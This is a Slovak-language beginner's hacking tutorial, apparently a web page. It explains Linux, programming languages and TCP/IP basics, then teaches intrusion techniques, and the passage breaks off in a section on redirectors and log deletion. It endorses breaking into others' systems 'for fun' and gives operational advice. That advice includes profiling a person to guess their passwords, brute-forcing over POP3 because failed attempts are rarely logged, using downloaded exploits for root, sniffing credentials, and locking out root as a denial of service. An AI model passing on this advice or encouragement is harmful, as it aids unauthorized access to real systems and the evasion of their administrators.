linux

Uvod do hackovania .... ako sa stat hackerom ???
ok .... tema hack je velmi popularna tema .... preto ju nevynecham ani ja ...  pokusim sa vam priblizit co je hacking ... a poradit ako zacat ... tiez si  opiseme techniky ktore crackeri , hackeri vyuzivaju pri prieniku do systemu.
CAST I
Hacking !? co je to ??? Hacker!? kto je to ???
Hacking, hackovanie ....  pod pojmom hackovat si predstavujeme prenikanie do cudzieho systemu a plne ho  ovladnut za ucelom ziskavania informacii o systeme a samozrejme pristup k  informaciam, ktore mozme potom vyuzit pre svoj prospech.
Clovek ktory sa pokusa preniknut do systemu sa nazyva hacker ... vela ludi si  mysli ze je hacking trestny a ze hackeri patria za mreze .... ale vela zvas si  mily hackerov za crackerov ... hacker nerobi nic nezakonneho !!! neniciny pracu  inych ludi on sa len pokusa ucit .. hladat chyby aby tu chybu mohol opravit a  naprogramovat to dokonalejsie ! naozajstny hackeri nenicia ale vytvaraju ... !  Keby nebolo hackerom nebol by internet prave hackeri vytvorili internet, udrzuju  www v chode a mnoho dalsich veci len niekto slovo hacker pochopil zle a nema  zaujem ho pochopit v pravom slova zmysle...
Hackeri sa delia na niekolko skupin aby sa rozlisili ty zly od elity,  zacinajuci od pokrocilich atd ,,,
Hacker - clovek ktoreho bavi skumat detaili programovatelnych systemov  a sposobi jak maximalne vyuzit ich schopnosti narozdiel od beznich uzivatelov.  Je to clovek ktory programuje s nadsenim a je dobry v rychlom programovani.
Cracker - je clovek ktory prenika do systemu za ucelom skodit ,  kradnut atd... tyto ludia sa oznacuju za hackerov ale nimi niesu... Na  preniknutie vyuzivaju chyby ktore objavili hackeri...
Lamer - Clevek  ktore ma male vedomosti a mysli si ze hacker je cracker ;-) Snazi sa prenikat do  systemov vyuzivajuce chyby ktore nasli hackeri .... takze sa az tak od crackerov  nelisia len ze su hlupy :) a nevedia kde hladat exploity a ako ich pouzit :)
Looser - Nema ziadne skusenosti ale pokusa sa ziskat informacie o  hackingu a hackeroch.
Ako sa stat hackerom ???
Ak ste sa rozhodli stat hackerom verte tomu ze  musite mat velku trpezlivost , chut a musite byt uceniuchtivy :) Ucenie sa vam  nesmie stat drinou ale prave naopak zabavou !!! Takym konicnom pri ktorom sa  odreagujete.
V prvom rade si musite zaobstarat kompik uz asi ho mate ak citate tieto  riadky :) Zozente si linux alebo niejaky iny typ BSD-unix. (odporucal by som na  zaciatok RED HAT LINUX) Niekedy instalacia linuxu bola vraj priserne tazka ale  uz v dnesnej dobe nieje to az taky problem ! Neznamena to ze sa musite vzdat  hned windowsu ! Na jednom pocitaci mozte mat nainstalovany aj windows aj Linux  .... Po nainstalovany linuxu nic vam neostava iba sa vnom ucit, spoznavat ho ,  hrat sa snim, opravovat si ho ... Citajte vsetko co vam pride o tomto os pod  ruky. Ale nestaci to len precitat musitesi vsetko vyskusat. A ak budete mat  niejaky problem najprv studujte snazte sa ho vyriesit a ak sa vam to nedari az  potom sa pytajte ludi na ircecku ... alebo odbornikov vo svojom okoli ... ale  nie sposobom neprides mi to urobit ??? nie vy si to musite urobit sami aby ste  stym v buducnosti nemali problem !
Preco prave linux ??? Asi si hovorite preco sa mam ucit prave v linuxe preco  mi nestaci windows alebo iny OS... Tu su niekolko bodov preco prave linux je ten  pravy operacny system !
1. Unix/Linux je operacny system internetu ! Vyse 80% (ak nie viac  nemam presne statistiky ) webovych serverov bezi prave pod linuxom (unixom). A  nielen webove ale vsetke !!!(a verte ze to cislo sa bude zvysovat :) Unix a  internet patria dokopy a uz ich nic nerozdeli ani Microsoft hoci sa snazi :))  Internet mozte pouzivat bez linuxu ale ucit sa hackovat to nejde ! AK chcete v  niecom hladat chyby musite to najprv dobre poznat a tak mozete sa pokusat najst  strbinku ktora vam umozni preniknut dnu!!!
2. Okrem toho ze je linux  zdarma mate pristup aj k zdrojovemu kodu ... Windows je sireny binnarne. Vdaka  tomu ze Linux a vela linuxovych aplikaciach je dodavana v zdrojovej forme cize  mate pristup k zdrojovym kodom mozte ho studovat ...lepsie ho spoznat a  upravovat podla svojho gusta a tak ziskat vela znalosti ...
3.Najlepsi sposob ako sa naucit TCP/IP a hoci co o pocitacov je  vlastna skusenost. Linux vam ponuka prilezitost ako taku skusenost ziskat ...
4. A o vykonnosti pomlcim lebo by to presahovalo ramec tejto prirucky  :) urcite vas Linux nesklame svojimi vymozenostami ...
Ovladat linux vam nestaci aby ste sa stali elitou a boli uznavany medzi  hackermi ... musite sa naucit programovat ! Zaklad je ovladat jazyk C ktory je  zakladny jazyk unixu ! Skoro cely Unix je v Cecku napisany ... A to nieje iba  tento dovot preco sa ho ucit. C je univerzalni programovaci jazyk nizkej urovne  , pre vela uloh je efiktivnejsi a rychlejsi ako ine jazyky. Ma usporne  vyjadrovane, je strukturizovany, ma velky subor operatorov a dalsie vyhodi ktore  nebudem opisat lebo by sme zas prekrocili ramec tejto prirucky ;)
Nestaci sa naucit programovat len v cecku musite byt schopny sa naucit za  kratky cas novy programovaci jazyk spojovanim manualu a toho co uz viete z ineho  programovacieho jazyka ! A nato vam nestaci iba jazyk C musite ovladat niekolko  inych odlisnych jazykov...
Ak ste este nikdy neprogramovali neskusajte sa ucit ako prvy jazyk C lebo vas  to ryhle omrzi. Ako s prvym mozte zacat napr. s jazykom python . Jazyk python je  volne siritelny a bezi na roznych operacnych systemov ako Unix. Ms-DOs, windows  9x/NT, Mac OS. Python je jednoduchy beztypovy interpretovany jazyk. Napriek  svojej jednoduchosti je objektovo orientovany , mozeme pouzivat tiez triedy,  asociativne pola a dalsie vymozenosti. Ak uz budete mat skusenosti s  programovaik az tak mozte prejst na Cecko . Tiez nieje od veci sa naucit jazyk  Perl. Jazyk Perl sa vacsinou vyuziva na vytvaranie aktivnych webovych aplikacii.  Je tiez jednoduchy a je vhodny aj pre zacinajucich programatorov . Perl je jazyk  pre manipulaciu s textom , hladanie v texte, je dobrym jazykom pre vela uloch  okolo spravy systemu atd... tiez bezi na rozne operacne systemi Unix , windows  9x/NT Os/2 a pod... A tiez by ste sa mali naucit jazyk LISP. Ak budete ovladat  LISP bez problemov by ste sa mali naucit programmovat v jazykov ako TCL/Tk,  Scheme, Prolog, common lisp,autolisp, cmlisp, elisp, atd. Vsetke tieto jazyku  maju spolocny zaklad a tim je LISP :)
Dalej sa naucte tvorit WWW. Ako prve sa naucte HTML jazyk je velmi jednoduchy  a pochopite ho za niekolko hodin. Ako doplnok k html vam posluzi CSS. A pre  vytvaranie internetovych aplikacii je velmi dobry jazyk s nazvom PHP.
CAST II
Prvu cast prirucky mame ukoncenu ... Dufam ze ste pochopili kto  je hacker. Kto to mysli s hackovanim vazne urcite si zaobstaral linux , zacal sa  ucit vytvarat WWW , uci sa programovat a zhana knizky , texty, navody o  programovani ,linuxe ,www atd ...
V druhej casti si povieme nieco o internete, akym sposobom medzi sebou  komunikuju pocitace v internete , co je IP adresa , protokoly, port apod... Su  to veci ktore by mal vediet kazdy cloviecik vyuzivajuci internet. Zial to tak  nieje a co je horsie nevedia to ani ty co chcu hackovat a byt hackermi :)
Co je Pocitacova siet ???
Pojdeme pekne od zaciatku co je to pocitacova  siet ? Pod pojmom siet si mozeme predstavit niekolko pocitacov navzajom  prepojene.
Existuju viacero typov sieti a kriterii podla ktorych sa delia.  Podla rozlohy sa siete delia do troch skupin.
LAN (Local Area Network) - lokalne datove siete MAN (Metropolitan Area Network) - meske datove siete WAN (Wide Area Network)  - verejne datove siete.
Lan - Lokalne siete zaberaju uzemie nepresahujuce 1-2 km. Vacsinou sa  rozprestieraju v ramci jednej budovi alebo skupin budov.
Man -Mestke  siete zaberajuce uzemie mesta. (niekolko km). Vacsinou vznikaju prepojenim  niekolko vzdialenych sieti Lan.
Wan - Verejne datove siete . Tieto  siete zaberaju svojim rozsahom niekolko obci , mesta alebo aj staty.
A  samozrejme ako posledna a najvacsia siet je siet internet ktora je pospajana z  tychto sieti. Jeto taka siet sieti :)
Internet
Ako uz vieme siet internet nieje len jedna siet ale je to siet  zlozene z dalsich vela sieti. Internet tvoria narodne siete, mestke siete,  komercne siete, statne regionalne siete , male siete zamerane na poskytovanie  sluzieb siete internet individualnym uzivatelom atd... Tieto siete su znacne  rozdielne pokial ide o technicke aj programove vybavenie. Na to aby mohli  vzajomne spolupracovat je v ramci siete internet k dispozicii subor sietovych  protokolov ktore sa nazyvaju TCP/IP.
Komunikacne protokoly v Internete
Nato aby sme mohli medzi sebou  prepajat rozne druhy sieti musia medzi sebou vediet komunikovat. Pocitacove  siete pouzivaju pre vzajomnu komunikaciu sietove protokoly. Sietovych protokolov  existuje cela kopa. V internete sa pouzivaju sietove protokoly TCP/IP
Co je to protokol ??? Protokol si mozme preedstavit ako subor pravidiel ,  ktore pouzivaju medzi sebou protilahle sietove objekty. Prikladom protokolu je  napr. subor pravidiel, ktory pouzivaju medzi sebou programy elektronickej posty  na dorucenie emailu od odosielatela k adresatorovi. Tento protokol musia  dodrziavat vsetke pocitace v sieti. V opacnom pripade si nebudu rozumiet a email  nedojde k adresatorovi. Kazda sluzba na internete musi mat svoje protokoly.
Data po sieti sa prenasaju v tzv. paketov. Paket je zakladna jednotka  prenosu, ktory sa bali do datoveho ramca.
Adresacia v Internete
Kazdy pocitac pripojeni do siete internet ma  pridelenu jednoznacnu ciselnu adresu ktora sa naziva IP adresa. Jednou z nevyhod  IP adries je ich ciselny charakter. Pre cloveka je si tazko zapamatat adresu  typu 195.125.95.12. Preto sa okrem ciselneho typu adries zaviedli symbolicke  adresy. Ich vyhodou je ze bezneho pouzivatela internetu nemusia zaujimat ciselne  adresy ale v tomto pripade ma IP adresa textovy tvar napr. qwertz.sk ....  Textova adresa sa sklada z dvoch casti oddelenych bodkov uzol. domena
Internetova adresa pre posielanie emailu ma tvar
userid@domena
Pred znakom @ je vzdy meno pouzivatela. Napravo od znaku @ nasleduje  meno hostitelskeho pocitaca za ktorym nasleduje domena. Viac o IP adresach A IP  protokole sa docitate v casti venovanej TCP/IP
Co je kliet/server ?
K najvacsim vyhodam sietovych technologii patri  spolocne vyuzivanie zdrojov siete. Je to umoznene nainstalovanim dvoch  oddelenych proogramov, ktore su na roznych pocitacov. Jeden program sa nazyva  server a poskytuje zdroj informacii, druhy program sa nazyva klient a umoznuje  vyuzit tento zdroj informacii.
Vsetke sluzby na internete vyuzivaju vztah  klient/server.
Napr. ak pouzivate ircecko .. kient je program cez ktory sa  napajate na irc a server je program ktory vase poziadavky prijima a spracuvava  ich....
Protokoly TCP/IP
ok ... takze internet vyuziva rodinku protokolov  TCP/IP takze si nieco o nich povieme... Nazov TCP/IP vznikol z dvoch  najvyznamnejsich protokolov A to protokolu IP a protokolu TCP ktore zabezpecuju  spolahlivy prenos medzi jednotlivymi uzlami v internete.
IP protokol (Internet protocol)
Ip protokol dopravuje data medzi dvoma  roznymi pocitacmi v internetu. Data su od odosielatela k prijimatelovi  odosielane cez smerovace. Paket prechadza cez spustu smerovacov. Kazdy smerovac  riesi samostatne smerovanie k nasledujucemu smerovacu a tak paket prechadza od  smerovaca k smerovacu az kym nedojde do ciela. IP-protokol je tvoreny dalsimi  protokolmi a to:
1. Vlastnym protokolom IP
2. Sluzobnym protokolom ICMP
3. Sluzobnym  protokolom IGMP
4. Sluzobnym protokolom ARP
5. sluzobnym protokolom RARP
IP adresa
Ip adresa je dlha 4 bajty tieto bajty obsahuju adresu siete a  adresu pocitaca na tejto siete. Na internete nemozu byt dve pocitace ktore  obsahuju rovnaku IP adresu lebo IP protokol by nevedel na aku ip adresu ma  poslat pakety.
Protokol TCP
Protokol IP prepravuje data medzi lubovolnymi pocitacmi v  internete a protokol tcp dopravuje data medzi dvoma konkretnymi aplikaciami  beziacimi na tychto pocitacoch.
Protokol TCP je spojeny sluzbou connection  oriented tj. sluzba ktora medzi dvoma aplikaciami vytvori spojenie. Adresa v  protokolu TCP je urcena tzv. cislom portu. Toto cislo je 2 bajtove cize moze mat  hodnotu 0 az 65535. Cielova aplikacia je v internete adresovana IP adresou ,  cislom portu a pouzitym protokolom.
Mozme si to predstavit tak ze IP adresa  je adresa domu a port zodpoveda menu konkretneho obyvatela domu.
Koncime nasu vyhladku protokolmy ... o protokolov existuju pekne hrube  knizky... To co som napisal tu je iba minimum ... islo mi oto aby ste vedeli co  je ip adresa , co su porty , co je protokol .... Ak ste sa to dozvedeli tato  cast splnila ulohu ... Kazda sluzba na internete vyuziva iny protokol a tieto  protokoly by ste mali studovat aby ste vedeli ako to na internete funguje...  dobre zdroje na ziskavanie vedomosti o protokoloch su rfc subory.
CAST III
ok .... mozme pokracovat dalej ... v tejto casti prirucky si  povieme o technikach ktore vyuzivaju crackeri na preniknutie do systemu. A  nielen crackeri ale aj hackeri.... :) Predpoklada sa ze kazdy spravny hacker ma  za sebou niejaky ten cracking pre zabavu a ziskanie novych skusenosti a pozna  vela zakladnych technik. I hackeri maju svoju etiku ktorej sa drzia:
1. Viera ze zdielanie informacii je spravne a ze je etickou povinostou  hackerov sa delit o svoje poznatky pisanim open source a ulahcovanim pristupu k  infomaciam co v najvacsej miere.
2. Viera ze naburavanie do systemov pre  zabavu a ziskanie skusenosti je eticky v poriadku pokial vsak nedojde k  vandalizmu , zniceniu informacii ci porusenie ich utajeniu.
Takze si povieme niejake pravidla ktorych by ste sa mali drzat !
1.Nikdy  nahackujte pre popularitu !!! Nemente indexi !!! ale pre zabavu a ziskanie  informacii (skusenosti)
2. Po naburani nezneuzivajte informacie, neporusujte  sukromie ludi, nenicte pracu druhych , nekradnite !!!
3. Po naburani do  systemu vysvetlite spravcovi najlepsie s mailom zo superuzivatelskeho uctu ako  doslo k naburaniu a ako tuto dieru zaplatat.
Verte tomu ze ak budete dodrziavat tieto body ziskate si dobre internetove  vztahy a budete viac popularnejsi ako crackeri :) Mozno nie v TV nebudu sa o vas  pisat clanky v novinach ale v ociach spavcov ktory vam budu ochotny stale pomoct  ....
Porty a sluzby
O portoch uz bola rec teraz sa pozrieme ake sluzby bezia  na jednotlivych portoch. Tieto sluzby mozu obsahovat (a vacsinou aj obsahuju :)  niejaku chybu cez ktoru mozme preniknut dnu. Cim viac sluzieb server poskytuje  tym mame vacsiu sancu prieniku. Pozrime sa teraz na standartne sluzby a na porty  kde standartne bezia.
port 7 echo - Echo je jednoduchy nastroj protokolu ICMP, ktorym mozeme  testovat dosazitelnost jednotlivych uzlov v internete. Vy odoslete ziadost o  echo (ICMP-paket) a cielovy uzol je povinny odpovedat ICMP-paketom (echo)  Vykusat si to mozte napr. s programom ping obsahuje ho kazdy OS.
port 21 ftp - Urcite vela zvas sa stretli s touto sluzbou. Pouziva sa  na prenos suborov. Ftp je najcastejsie nastaveny tak aby prijimal iba poziadavky  iba od tych uzivatelov , ktory maju na systemu kde bezi FTP server uzivatelsky  ucet. Ale mozte ho nastavit aj ako anonymni FTP ktory bude prijimat poziadavky  od kazdeho. Ale hackeri casto najdu niejaku strbinku a preniknu cez anonymni ftp  do systemu :)
port 22 ssh - Je to akasi nahrada za telnet. Telnetom neprebieha  komunikacia kryptovane cize je tam moznost odchytavania hesiel atd... SSh tento  problem riesi tym ze cela komunikacia prebieha kryptovane.
port 23 telnet - S touto sluzbou si vytvarate sedenie na vzdialenym  pocitaci. Cize sa prihlasite a pracujete snim ako keby ste sedeli pri nom :) Tu  je to riziko ze je moznost odchytavania hesiel a pre hackera nieje to problem :)
port 25 smtp - tuto sluzbu uz viuzival kazdy :) je to postovny  protokol. Cela postova komunikacia prebieha cez smtp protokol ak sa chcete  naucit posielat fake-maili ;-) naucte sa smtp protokol . O prenos posty z  jedneho pocitaca na druhy sa stara program sendmail ktory je velmi kvalitnym  postovnym agentom :)
port 53 Nameserver (bind) - Tato sluzba je asi najdieravejsia :) stale  sa tu najde niejaka chybicka. Nameserver sa stara o spravu domeny.
port 79 finger - Pomocou fingeru sa ziskavaju informacie ktore  hackerovi mozu vela pomoct:)
port 80 http - Cez protokol http sa prenasaju www stranky a asi ho  pouzivate velmi casto :)
port 110 pop3 - Pomocou tohto protokolu si vyberate maili z mailovych  schranok :)
To boli standartne porty ak chces vediet ake ine sluzby bezia na ktorych  portov pozri si straku www.unio.org ... Neznameno to ak napr. sluzba smtp nebezi  na porte 25 tak tuto sluzbu uz server neposkytuje ,,, moze kludne bezat aj na  porte 1252 :) zalezi na spravcu ci ju chce poskytovat kazdemu alebo hodi to na  vysi port a vie otom iba on :)
Scanovanie Portov...
Ak chceme zistit ci dana sluzba bezi na serveri  mozme to urobit jednoducho. Pomocou telnetu sa telnetneme na standartny port  danej sluzby a ak sa spojenie uskutocni sluzba bezi a ak nie tak nebezi. Ak  chceme zistit vsetke sluzby ktore na masinke bezia musime sa telnetnut na vsetke  65355 portov. Je to pekna drina sa telnetovat postupne na vsetke porty a  zapisovat si kde sa uskotocnilo spojenie a aka sluzba tam bezi :) Nastastie  existuje utilitka ktora za nas tuto spinavu robotu urobi a poda nam hlasenie :)  Existuju niekolko typov scanerov...
connect() scan
tento druh scaneru je najstarsi Postupne sa pokusa  klasicky pripajat na kazdy port ak sa spojenie uskutocni oznaci port ako za  otvoreny a ak nie tak za uzavrety...
FIN, Xmas tree a NULL  scan
Tieto typi scanerov vyuzivaju chyby v TCP protokole.
Existuju aj dalsie typy scanerov a urcite vzniknu aj ine :) Vsetke su  zalozene na niejakej chybe v TCP protokole a pod....
Ovladanie scanerov je velmi jednoduche ako parameter sa zada IP adresa stroja  ktory chceme scanovat a zatym cislo portu po ktory chceme scanovat ... vystup  zalezi od scanu ale vacsinou vizera niejak takto :
21 (ftp) is running.
23 (telnet) is running.
25 (smtp) is  running.
79 (finger) is running
.80 (http) is running.
110 (pop-3) is  running.
935 (UNKNOWN) is running.
Vydime ze na serveri su otvorene 7 porty cez ktore sa mozme dostat dnu do  systemu :) Ostava nam zistit ake verzie sluzieb bezia a vyhladat exploity :)  Ziskavanie informacii o serveri je prvym krokom co hacker uskutocni :) a ktomu  patri aj scanovanie aby zistil ake sluzby bezia a urobil si tak predstavu o  preniknuti na server alebo aj o IQ spravcu (o:
Masove scanovanie
Masove scanovanie je obycajne scanovanie stym  rozdielom ze sa nescanuje jedna Ipecka ale niejaky rozsah Ipeckov. Nescanuju sa  vsetke porty ale iba porty na ktorych bezia naburavatelne sluzby ... Takto sa  hacker neorientuje iba na jednu masinu ale na lubovolnu za ucelom hodit na nu  redirector a pod.. ( o redirectorov viac dalej).
A nakoniec niejake url kde ziskate tie najlepsie scaneri .... samozrejme  bezia pod linuxom :) http://www.insecure.org/nmap - nmap najznamejsi a patri  medzi najlepsi port scaner.
http://www.nessus.org - nessus tento scanerik  dokaze poskytnut mnozstvo informacii o zabezpeceni vasho systemu.
Lamanie hesiel ...
Dajme tomu ze chceme prelomit heslo roota na  niejakej masinke ... Mozme napr. sa telnetnut na port 23 kde bezi sluzba telnet  (samozrejme ak je pristupna) zadame Login root a potom nas telnet vyzve na  zadanie hesla ... to heslo samozrejme nemame .. mozme predpokladat ake heslo by  mohol si root zadat .. vyskusame ako heslo jeho login cize root , ak vieme co  rad robi tak ako heslo vyskusame jeho zalubu , meno jeho dievcata a pod ....  mozno budeme mat stastie a podari sa nam heslo uhadnut (o: Nieje to nic prijemne  a ked budeme chciet vyskusat okolo 1000 moznych hesiel rychle nas to omrzi (o:  Ale nastastie existuju utilitky ktore to budu robit za nas a ovela ale ovela  rychlejsie ... Tieto utilitky vyuzivaju najcastejsie dva metody hadania hesiel  ....
1. Brutal Force - je to metoda pokusov a omylov :) Utilitka skusa  vsetke mozne kombinacie cisiel , znakov napr. aaaa , aaab , aaac , aaad atd ...  Existuje cela kopa utilitiek s vela funkciami kde si mozte nakonfigurovat z  ktoryh pismen ma vytvarat kombinacie , kolko miestne heslo , ci ma pouzivat aj  cisla atd ...
2. Dictionary Attack - utok pomocA­ wordlistu (slovnA­ku). Slovnik  obsahuje niekolko tisic slov ktore sa mozu vyskytnut ako heslo. Slovnikov na  internete najdete spustu podla roznych zamerani. napr. mena skupin, slovensky  slovnik , cesky slovnik , nazvy mien atd ...
Spomenuly sme si dve techniky lamania hesiel. Obycajny uzivatelia si volia  lahko zapamatatelne heslo. Ak maju heslo pridelene tak si ho vacsinou zmenia na  lahsie (ak je to mozne)alebo si ho niekde zapisu. Ak sa pokusate zlamat heslo  niejakej konkretnej osoby snazte sa o nej dozvediet co najviac vela uzivatelov  pouziva ako heslo, rodne cislo , meno frajerky , oblubenej skupiny a apod... Ty  lepsi sa snazia robit kombinacie napr meno frajerky s svojim datumom narodenia  atd .. Na take hesla nam je Dictionary Attack nanic lebo vacsinou slovniky  taketo slova neobsahuju .
Priemerna dlzka hesla je 6 znakov . Uzivatelia si volia hesla vacsinou z  malych pismen a pouzivaju slova ktore maju niejaky zmysel ako keby mali pouzivat  niejake kombinacie cislic a znakov ...
Teraz sa pozrieme na percentualny  vyskyt pismen v hesle ktore sa vyskytovali na jednom hacknutom serveri
znak                hacked               
a                10,38       
b                1,96               
c                2,51               
d                2,65               
e                5,92               
f                1,02               
g                1,15               
h                1,60               
i                5,63               
j                1,00               
k                4,15               
l                3,99               
m                3,47               
n                4,67               
o                6,81               
p                2,21               
q                0,16               
r                5,39               
s                4,25               
t                3,88               
u                2,32               
v                1,49               
w                0,50               
x                0,42               
y                0,74               
z                0,61               
1                3,07               
2                2,27               
3                1,44               
4                1,24               
5                1,51               
6                1,60
7                1,90               
8                1,46               
9                1,54               
0                2,42               
A                0,28               
B                0,11               
C                0,09               
D                0,13               
E                0,13               
F                0,06               
G                0,04               
H                0,06               
I                0,14               
J                0,06               
K                0,14               
L                0,10               
M                0,22               
N                0,10               
O                0,13               
P                0,12               
Q                0,00               
R                0,14               
S                0,16               
T                0,10
U                0,04               
V                0,06               
W                0,02               
X                0,03               
Y                0,02               
Z                0,04
Skusat lamat hesla mozte v roznych sluzbach cez ftp , telnet ale najlepsie je  cez pop3 (standartny port 110). Protokol pop3 pouzivate ked si idete vybrat  emaili ... (prestuduj si protokol pop3 a vyskusaj si precitat postu cez telnet  ... )
Ake su vyhodi lamania hesla cez pop3 ???
Tato sluzba bezi  skoro na kazdom serveri ...
Pri nespravnom hesle je moznost okamziteho  opakovania
Ak hladas hesla cez ftp alebo telnet moze po niekolko neuspesnych  pokusov bloknut konto a tym padom nemozes skusat dalej cez pop3 to vacsinou  neplati ...
Po niekolkych pokusov ta server odpoji ale mozes sa napojit a  skusat dalej ...
A co je najpodstatnejsie na niektoryh systemov sa neloguju  nespravne pokusy....


O utilitkou takeho druhu na internete nieje  nudza a urcite ich lahko najdes. Ale mi chceme byt hackeri tak by sme nemali mat  problem si taku utilitku naprogramovat sami ;)
Exploitova Technika
Hackeri vobec nevyuzivaju na prienik do systemu  vyssie popisanu tychniku (lamanie hesiel) Ale dostavaju sa dnu pomocou  exploitov. Exploit moze byt program alebo niejaka specialne zadana URL ktora  sposobi neobykle chovanie systemu napr. nam hodi rootovske prava. Vacsina tychto  exploitov vyuziva Buffer Overflow co znamena pretecenie zasobniku. Nie vsetke  exploity vyuzivaju len Buffer Overflow vela sluzieb beziacich na serverov je  dieravych (IMAP, sedmail , bind , pop3 a pod) cez ktore mozme ziskat rootovske  prava... Hacker si jednoducho pozistuje cim viac informacii o serveri , ake  sluzby na nim bezia, ake verzie, pod akym os server bezi atd.. a snazi sa najst  na niejaku sluzbu exploit ktory mu zabezpeci rootovske prava :) Ak zisti ze  niejake sluzby su dierave stiahne exploit spusti ho a server je jeho (o:
Tieto exploity su volne dostupne najdete ich na strankach www.rootshell.com  alebo www.bugtray.com a na skoro vsetkych ktore sa zaoberaju  bezpecnostou...
Najlepsie je sledovat mailing list, bugtrag a vsetke stranky  ktore sa zaoberaju pocitacovov bezpecnostou. Ak sa vyskytne niejaka nova diera  hned budete informovany a budete si moct dieru zaplatat :) alebo naopak vyuzit  ju na prienik do cudzieho systemu ....
Kazdy spravca ktoremu zalezi na  bezpecnosti by mal sa zaregistrovat do mailing listou a sledovat stranky  zaoberajuce sa pocitacovov bezpecnostou .... zial to tak nieje a malo ktory  spravca si da zalezat aby si pravidelne zaplatal nove dieri ...
Sniffing
Pozname viac topologii sieti. Topologiou siete rozumieme  strukturu ktorou vytvaraju kabely prepojujuce jednotlive uzly siete.  Najjednodussiu topologiu ma sbernica. Je tvorena vedenim k nemu su pripojene  jednotlive uzly. Ak spojime obidve konce zbernice ziskame topologiu kruhovu. A  tretim je topologia hviezda. U hviezdy vychadzaju jednotlive vedenia paprskovite  z centralneho zariadenia v ktorom su prepojene. (Rozbocovac) Ok ale nejdeme  budovat siete :) Predstavme si ze mame doma postavenu siet z styroch pocitacov v  sbernicovom zapojeni. (cize su pospajane postupne). AK prvy pocitac komuniku s  stvrtym pocitacom pakety prechadzaju aj cez druhy a treti pocitac ale sietove  karty tychto pocitacov sa o tieto pakety nestaraju lebo niesu adresovane im a  ich prepustia dalej...Ale sietova karta sa da nastavit do tzv. promiskuitneho  modu co zapricini ze sietova karta si uz bude vsimat aj pakety ktore mu nepatria  :)
Pomocou odchytavania paketov mozeme velmi jednoducho zistit hesla uzivatelov  lokalnej siete pouzivajucich programy telnet, ftp, atd....Sietovu kartu do  promiskuitneho modu moze prepnut iba root. (niektore starsie sietove karty ani  prepnutie do tohto modu ani nepodporuje). Cize najlepsie je odchytavat paketu na  svojej lokalnej sieti alebo uz na niejakej hacknutej masinke....
snifferi prave prepnu sietovu kartu do promiskuitneho modu a zacne odchytavat  vsetke pakety ktore prejdu cez masinku. Ale ak nam bude odchytavat vsetke pakety  budeme mat problem najst pozadovany paket z mnozstvo odchytenych paketov. Na  tento problem sluzia rozne filtre ktore snifferi obsahuju.
Pomocou filtra si urcime ake pakety ma odchytavat. Najlepsie je ho nastavit  tak aby zachytaval iba pakety na tych protokolov kde sa vyzaduje zadat login a  heslo (ftp, pop3, telnet atd).
Ani o snifferi nieje nudza na internete dokonca i na slovenskom internete  najdete poriadne snifferi ktore obsahuju poriadne filtre s vela moznostami ...
DoS attack (Denial of Service)
POmocou DOS utoku zmemoznime pouzivat  niejaku sluzbu na serveri alebo odstavime cely server. Je lahko DoS utok vyvolat  ale tazko je proti nim sa branit... Ako si mozno uz myslite nieje to hackovanie  ale zato sa dost to vyuziva preco ???
1. Bud sa chce niejaky lamer ukazat ze nieco dokaze
2. Z pomsty
3.  K ziskaniu pristupu na server
Dos utokov je obrovske mnozstvo ... Vacsinou sa vyuzivaju k ziskaniu pristupu  na system. Ako sme povedali proti dos utokom je sa tazko branit ale neurobia na  serveri ziadnu skodu , ale sposobia iba vypadok servera ktory je treba potom iba  rebootovat a bezi dalej ako keby sa nic nestalo ...(o: A naco je dobre  rebootovanie servera ???
Niektore systemu obsahuju dieri pri startovani , ktore sa mozu vyuzit k  ziskaniu rootovskych prav
Pri rebootovani mozme system ovladnut zatial ked  startuje pokial vieme na ktorom porte pocitac nacuva. Na tento port sa posielaju  falosne pakety s ktorymi ovladneme system ...
Teraz sa pozrieme na niejake priklady DOS utokov je ich obrovske mnozstvo a  nebudem tu popisat vsetke a ani vsetke neviem :) DOS utoky nemusia prebiehat len  z vonka ale aj z vnuutra takze stych najznamejsich ...
Znemoznenie pristupu - Niektore serveri maju nastavene ze po urcitom  pokuse zleho prihlasenia na ucet , ucet zablokuje... a tym padom sa nebude moct  prihlasit ani uzivatel ktory vie spravne heslo. Ak sa serveri je to nastavene  mozme to urobit na roota ... po niekolkych pokusov sa konta zablokuje a uz sa  nebude moct nalogovat root , jedinim riesenim bude rebootovat masinku ......
E-mail spamming - urcite viete ak poslete email na neexistujuci email  tak vam pride o tom informacia prostrednictvom mailu (Mail Administration  Error). AK utocnik posle zaujimavy fake-mail vsetkym na serveri a vacsina tychto  userov sa budu snazit na neexistujuci email odpovedat moze dojst k zahlteniu  siete alebo vyradenie sluzby SMTP ci POP... Ping flooding - tato metoda je dost  stara a skoro uz nikde nefunguje :) Pomocou pingu vyslete velky ICMP paket.  Server dostane paket po castiach a zacne ho skladat ale paket je velmi velky tak  nastane pretecenie a system sa rebootne alebo zamrzne ... Je to uz hrozne stare  a uz to vobec nefunguje
Anonymni FTP - Ak na serveri bezi anonymni  FTP a mate pravo nan zapisovat tak mozte sa pokusit zaplnit cely HDD ale iba  pokial je zle nastavene obmedzenie anonymnych uzivatelov.
To boli niejake utoky z vonku ako som pisal existuju aj DOS utoky z vnutra.  Utoky dos z vnutra maju jednu velku nevyhodu spravca systemu rychlo zisti kto  sposobil DoS utok lebo vsetko sa zapisuje do logov. Takze po rebootnutiu si  pozrie kto bol prave prihlaseny a co robkal (o: ale pozriet si niejake mozme ...
Zaplnenie HDD - pokusime sa zaplnit cely HDD a tak znemoznit  zapisovat na HDD inym userom ... Zial ho mozme vyuzit malo kde stohto dovodu  lebo userom sa nastavuju kvoty na disk.
Zaplnenie pamati - MOzme sa  pokusit alokovat vsetku dostupnu pamat. System zacne swapovat a celkom sa  spomali a moze dokonca aj zatuhnut. Ale spravca moze urcit aj limit pamate a  vyhnut sa pouzitiu tohto DoS utoku:)
OK to je o dos vsetko .. o novych dos utokov sa samozrejme dozviete na  strankach ktore sa venuju pocitacovej bezpecnosti ..
Redirektor
Vsetko o co sa pokusame , co na serveri robime sa  zaznamenava do logov (aj ked si prezerade stranky, pouzivate finger atd.. zalezi  aj od spravcu co chce logovat) ... Ak sa spravca dozvie ze niekto hackol jeho  msinku pozrie sa hned do logov a objavi vasu IP adresu :) Samozrejme mozme logy  vymazat (viac dalej) ale nikdy si nieste isty ci ste vymazali vsetko .. a co ked  sa loguje priamo na tlaciaren ??? vtedy sa logy nedaju vymazat .. (o:
